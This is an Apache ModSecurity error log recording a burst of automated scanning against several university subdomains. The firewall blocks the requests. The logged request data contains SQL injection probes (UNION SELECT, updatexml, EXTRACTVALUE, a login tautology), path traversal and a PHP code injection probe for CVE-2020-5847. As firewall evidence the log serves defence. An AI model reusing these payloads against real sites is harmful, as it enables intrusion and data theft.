[Tue Aug 29 11:30:37.450470 2023] [:error] [pid 975] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:_FILES[type][tmp_name]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: =@`\\x5c'` /*! found within ARGS:_FILES[type][tmp_name]: \\x5c' or mid=@`\\x5c'` /*!50000union*//*!50000select*/1,2,3,md5(999999999),5,6,7,8,9#@`\\x5c'` "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/plus/recommend.php"] [unique_id "ZO10bcCo-f0AAAPPSwcAAAAd"]
[Tue Aug 29 11:30:37.506001 2023] [:error] [pid 972] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:_FILES[type][tmp_name]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: =@`\\x5c'` /*! found within ARGS:_FILES[type][tmp_name]: \\x5c' or mid=@`\\x5c'` /*!50000union*//*!50000select*/1,2,3,md5(999999999),5,6,7,8,9#@`\\x5c'` "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/plus/recommend.php"] [unique_id "ZO10bcCo-f0AAAPMmA8AAAAY"]
[Tue Aug 29 11:30:37.563953 2023] [:error] [pid 956] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../ found within ARGS:file: /../../../context/2UdxjXFelR2tZ4yJH19Hg6ZVriU.cfm"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/lucee/admin/imgProcess.cfm"] [unique_id "ZO10bcCo-f0AAAO876wAAAAF"]
[Tue Aug 29 11:30:37.566579 2023] [:error] [pid 975] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:_FILES[type][tmp_name]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: =@`\\x5c'` /*! found within ARGS:_FILES[type][tmp_name]: \\x5c' or mid=@`\\x5c'` /*!50000union*//*!50000select*/1,2,3,md5(999999999),5,6,7,8,9#@`\\x5c'` "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/plus/recommend.php"] [unique_id "ZO10bcCo-f0AAAPPSwgAAAAd"]
[Tue Aug 29 11:30:37.576906 2023] [:error] [pid 908] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:_FILES[type][tmp_name]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: =@`\\x5c'` /*! found within ARGS:_FILES[type][tmp_name]: \\x5c' or mid=@`\\x5c'` /*!50000union*//*!50000select*/1,2,3,md5(999999999),5,6,7,8,9#@`\\x5c'` "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/plus/recommend.php"] [unique_id "ZO10bcCo-f0AAAOM4XUAAAAU"]
[Tue Aug 29 11:30:37.577301 2023] [:error] [pid 983] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:uid[1]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )--   found within ARGS:uid[1]: ) and updatexml(1,concat(0x7e,md5('999999'),0x7e),1)--  "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/public/index.php/home/index/bind_follow/"] [unique_id "ZO10bcCo-f0AAAPXAnEAAAAi"]
[Tue Aug 29 11:30:37.614977 2023] [:error] [pid 983] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:uid[1]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )--   found within ARGS:uid[1]: ) and updatexml(1,concat(0x7e,md5('999999'),0x7e),1)--  "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/public/index.php/home/index/bind_follow/"] [unique_id "ZO10bcCo-f0AAAPXAnIAAAAi"]
[Tue Aug 29 11:30:37.617533 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:uid[1]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )--   found within ARGS:uid[1]: ) and updatexml(1,concat(0x7e,md5('999999'),0x7e),1)--  "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/public/index.php/home/index/bind_follow/"] [unique_id "ZO10bcCo-f0AAAPDnyYAAAAP"]
[Tue Aug 29 11:30:37.623063 2023] [:error] [pid 908] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:uid[1]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )--   found within ARGS:uid[1]: ) and updatexml(1,concat(0x7e,md5('999999'),0x7e),1)--  "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/public/index.php/home/index/bind_follow/"] [unique_id "ZO10bcCo-f0AAAOM4XYAAAAU"]
[Tue Aug 29 11:30:37.635830 2023] [:error] [pid 983] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:uid[1]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )--   found within ARGS:uid[1]: ) and updatexml(1,concat(0x7e,md5('999999'),0x7e),1)--  "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/public/index.php/home/index/bind_follow/"] [unique_id "ZO10bcCo-f0AAAPXAnMAAAAi"]
[Tue Aug 29 11:30:37.640102 2023] [:error] [pid 964] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data:  found within TX:sqli_select_statement_count: 5"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/human.aspx"] [unique_id "ZO10bcCo-f0AAAPENeYAAAAQ"]
[Tue Aug 29 11:30:37.646710 2023] [:error] [pid 908] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data:  found within TX:sqli_select_statement_count: 5"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/human.aspx"] [unique_id "ZO10bcCo-f0AAAOM4XcAAAAU"]
[Tue Aug 29 11:30:37.648623 2023] [:error] [pid 1010] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data:  found within TX:sqli_select_statement_count: 5"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/human.aspx"] [unique_id "ZO10bcCo-f0AAAPyODsAAAAR"]
[Tue Aug 29 11:30:37.651172 2023] [:error] [pid 956] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data:  found within TX:sqli_select_statement_count: 5"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/human.aspx"] [unique_id "ZO10bcCo-f0AAAO8760AAAAF"]
[Tue Aug 29 11:30:37.663277 2023] [:error] [pid 972] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data:  found within TX:sqli_select_statement_count: 5"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/human.aspx"] [unique_id "ZO10bcCo-f0AAAPMmBMAAAAY"]
[Tue Aug 29 11:30:38.348008 2023] [:error] [pid 994] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:mailuid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  1=1 found within ARGS:mailuid: admin' or 1=1#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/process/aprocess.php"] [unique_id "ZO10bsCo-f0AAAPiBhQAAAAB"]
[Tue Aug 29 11:30:38.364205 2023] [:error] [pid 964] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../ found within ARGS:file: /../../../context/2UdxjXFelR2tZ4yJH19Hg6ZVriU.cfm"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/lucee/admin/imgProcess.cfm"] [unique_id "ZO10bsCo-f0AAAPENeoAAAAQ"]
[Tue Aug 29 11:30:38.366672 2023] [:error] [pid 1010] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:uid[1]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )--   found within ARGS:uid[1]: ) and updatexml(1,concat(0x7e,md5('999999'),0x7e),1)--  "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/public/index.php/home/index/bind_follow/"] [unique_id "ZO10bsCo-f0AAAPyOD4AAAAR"]
[Tue Aug 29 11:30:38.387669 2023] [:error] [pid 1001] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:_FILES[type][tmp_name]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: =@`\\x5c'` /*! found within ARGS:_FILES[type][tmp_name]: \\x5c' or mid=@`\\x5c'` /*!50000union*//*!50000select*/1,2,3,md5(999999999),5,6,7,8,9#@`\\x5c'` "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/plus/recommend.php"] [unique_id "ZO10bsCo-f0AAAPpWdwAAAAI"]
[Tue Aug 29 11:30:39.333081 2023] [:error] [pid 964] [client 143.42.78.27] ModSecurity: Rule 7fe1c606a5d0 [id "981243"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "245"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "journal.unla.ac.id"] [uri "/SamlResponseServlet"] [unique_id "ZO10b8Co-f0AAAPENewAAAAQ"]
[Tue Aug 29 11:30:39.335800 2023] [:error] [pid 964] [client 143.42.78.27] ModSecurity: Rule 7fe1c58deef8 [id "973302"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"][line "309"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "journal.unla.ac.id"] [uri "/SamlResponseServlet"] [unique_id "ZO10b8Co-f0AAAPENewAAAAQ"]
[Tue Aug 29 11:30:39.375769 2023] [:error] [pid 908] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data:  found within TX:sqli_select_statement_count: 5"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/human.aspx"] [unique_id "ZO10b8Co-f0AAAOM4XkAAAAU"]
[Tue Aug 29 11:30:39.403470 2023] [:error] [pid 956] [client 143.42.78.27] ModSecurity: Rule 7fe1c606a5d0 [id "981243"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "245"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "pusatbahasa.unla.ac.id"] [uri "/SamlResponseServlet"] [unique_id "ZO10b8Co-f0AAAO8768AAAAF"]
[Tue Aug 29 11:30:39.405310 2023] [:error] [pid 956] [client 143.42.78.27] ModSecurity: Rule 7fe1c58deef8 [id "973302"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"][line "309"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "pusatbahasa.unla.ac.id"] [uri "/SamlResponseServlet"] [unique_id "ZO10b8Co-f0AAAO8768AAAAF"]
[Tue Aug 29 11:30:39.434038 2023] [:error] [pid 908] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:params. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ))), found within ARGS:params: [{\\x22name\\x22:\\x22input_id\\x22,\\x22value\\x22:\\x22USERNAME' AND EXTRACTVALUE(1337,CONCAT(0x5C,0x5A534C,(SELECT (ELT(1337=1337,1))),0x5A534C)) AND 'joxy'='joxy\\x22},{\\x22name\\x22:\\x22input_passwd\\x22,\\x22value\\x22:\\x22PASSWORD\\x22},{\\x22name\\x22:\\x22device_id\\x22,\\x22value\\x22:\\x22xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\\x22},{\\x22name\\x22:\\x22checked\\x22,\\x22value\\x22:false},{\\x22name\\x22:\\x22login_key\\x22,\\x22value\\x22:\\x22\\x22}]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/http/index.php"] [unique_id "ZO10b8Co-f0AAAOM4XsAAAAU"]
[Tue Aug 29 11:30:39.440563 2023] [:error] [pid 964] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:params. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ))), found within ARGS:params: [{\\x22name\\x22:\\x22input_id\\x22,\\x22value\\x22:\\x22USERNAME' AND EXTRACTVALUE(1337,CONCAT(0x5C,0x5A534C,(SELECT (ELT(1337=1337,1))),0x5A534C)) AND 'joxy'='joxy\\x22},{\\x22name\\x22:\\x22input_passwd\\x22,\\x22value\\x22:\\x22PASSWORD\\x22},{\\x22name\\x22:\\x22device_id\\x22,\\x22value\\x22:\\x22xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\\x22},{\\x22name\\x22:\\x22checked\\x22,\\x22value\\x22:false},{\\x22name\\x22:\\x22login_key\\x22,\\x22value\\x22:\\x22\\x22}]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/http/index.php"] [unique_id "ZO10b8Co-f0AAAPENe8AAAAQ"]
[Tue Aug 29 11:30:39.459684 2023] [:error] [pid 983] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:params. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ))), found within ARGS:params: [{\\x22name\\x22:\\x22input_id\\x22,\\x22value\\x22:\\x22USERNAME' AND EXTRACTVALUE(1337,CONCAT(0x5C,0x5A534C,(SELECT (ELT(1337=1337,1))),0x5A534C)) AND 'joxy'='joxy\\x22},{\\x22name\\x22:\\x22input_passwd\\x22,\\x22value\\x22:\\x22PASSWORD\\x22},{\\x22name\\x22:\\x22device_id\\x22,\\x22value\\x22:\\x22xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\\x22},{\\x22name\\x22:\\x22checked\\x22,\\x22value\\x22:false},{\\x22name\\x22:\\x22login_key\\x22,\\x22value\\x22:\\x22\\x22}]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/http/index.php"] [unique_id "ZO10b8Co-f0AAAPXAnoAAAAi"]
[Tue Aug 29 11:30:39.488735 2023] [:error] [pid 994] [client 143.42.78.27] ModSecurity: Rule 7fe1c606a5d0 [id "981243"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "245"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/SamlResponseServlet"] [unique_id "ZO10b8Co-f0AAAPiBhkAAAAB"]
[Tue Aug 29 11:30:39.490943 2023] [:error] [pid 994] [client 143.42.78.27] ModSecurity: Rule 7fe1c58deef8 [id "973302"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"][line "309"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/SamlResponseServlet"] [unique_id "ZO10b8Co-f0AAAPiBhkAAAAB"]
[Tue Aug 29 11:30:39.561558 2023] [:error] [pid 903] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:params. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ))), found within ARGS:params: [{\\x22name\\x22:\\x22input_id\\x22,\\x22value\\x22:\\x22USERNAME' AND EXTRACTVALUE(1337,CONCAT(0x5C,0x5A534C,(SELECT (ELT(1337=1337,1))),0x5A534C)) AND 'joxy'='joxy\\x22},{\\x22name\\x22:\\x22input_passwd\\x22,\\x22value\\x22:\\x22PASSWORD\\x22},{\\x22name\\x22:\\x22device_id\\x22,\\x22value\\x22:\\x22xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\\x22},{\\x22name\\x22:\\x22checked\\x22,\\x22value\\x22:false},{\\x22name\\x22:\\x22login_key\\x22,\\x22value\\x22:\\x22\\x22}]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/http/index.php"] [unique_id "ZO10b8Co-f0AAAOH4VEAAAAH"]
[Tue Aug 29 11:30:39.565041 2023] [:error] [pid 983] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:params. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ))), found within ARGS:params: [{\\x22name\\x22:\\x22input_id\\x22,\\x22value\\x22:\\x22USERNAME' AND EXTRACTVALUE(1337,CONCAT(0x5C,0x5A534C,(SELECT (ELT(1337=1337,1))),0x5A534C)) AND 'joxy'='joxy\\x22},{\\x22name\\x22:\\x22input_passwd\\x22,\\x22value\\x22:\\x22PASSWORD\\x22},{\\x22name\\x22:\\x22device_id\\x22,\\x22value\\x22:\\x22xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\\x22},{\\x22name\\x22:\\x22checked\\x22,\\x22value\\x22:false},{\\x22name\\x22:\\x22login_key\\x22,\\x22value\\x22:\\x22\\x22}]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/http/index.php"] [unique_id "ZO10b8Co-f0AAAPXAn8AAAAi"]
[Tue Aug 29 11:30:40.618566 2023] [:error] [pid 910] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:params. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ))), found within ARGS:params: [{\\x22name\\x22:\\x22input_id\\x22,\\x22value\\x22:\\x22USERNAME' AND EXTRACTVALUE(1337,CONCAT(0x5C,0x5A534C,(SELECT (ELT(1337=1337,1))),0x5A534C)) AND 'joxy'='joxy\\x22},{\\x22name\\x22:\\x22input_passwd\\x22,\\x22value\\x22:\\x22PASSWORD\\x22},{\\x22name\\x22:\\x22device_id\\x22,\\x22value\\x22:\\x22xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\\x22},{\\x22name\\x22:\\x22checked\\x22,\\x22value\\x22:false},{\\x22name\\x22:\\x22login_key\\x22,\\x22value\\x22:\\x22\\x22}]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/http/index.php"] [unique_id "ZO10cMCo-f0AAAOOuXUAAAAW"]
[Tue Aug 29 11:30:41.832342 2023] [:error] [pid 983] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:site[x][text]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22); ?> found within ARGS:site[x][text]: <?php echo md5(\\x22CVE-2020-5847\\x22); ?>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/webGui/images/green-on.png/"] [unique_id "ZO10ccCo-f0AAAPXAosAAAAi"]
[Tue Aug 29 11:30:41.868646 2023] [:error] [pid 1012] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:site[x][text]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22); ?> found within ARGS:site[x][text]: <?php echo md5(\\x22CVE-2020-5847\\x22); ?>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/webGui/images/green-on.png/"] [unique_id "ZO10ccCo-f0AAAP05E8AAAAA"]
[Tue Aug 29 11:30:41.880207 2023] [:error] [pid 983] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:site[x][text]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22); ?> found within ARGS:site[x][text]: <?php echo md5(\\x22CVE-2020-5847\\x22); ?>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/webGui/images/green-on.png/"] [unique_id "ZO10ccCo-f0AAAPXAo0AAAAi"]
[Tue Aug 29 11:30:41.884842 2023] [:error] [pid 910] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:site[x][text]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22); ?> found within ARGS:site[x][text]: <?php echo md5(\\x22CVE-2020-5847\\x22); ?>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/webGui/images/green-on.png/"] [unique_id "ZO10ccCo-f0AAAOOuYAAAAAW"]
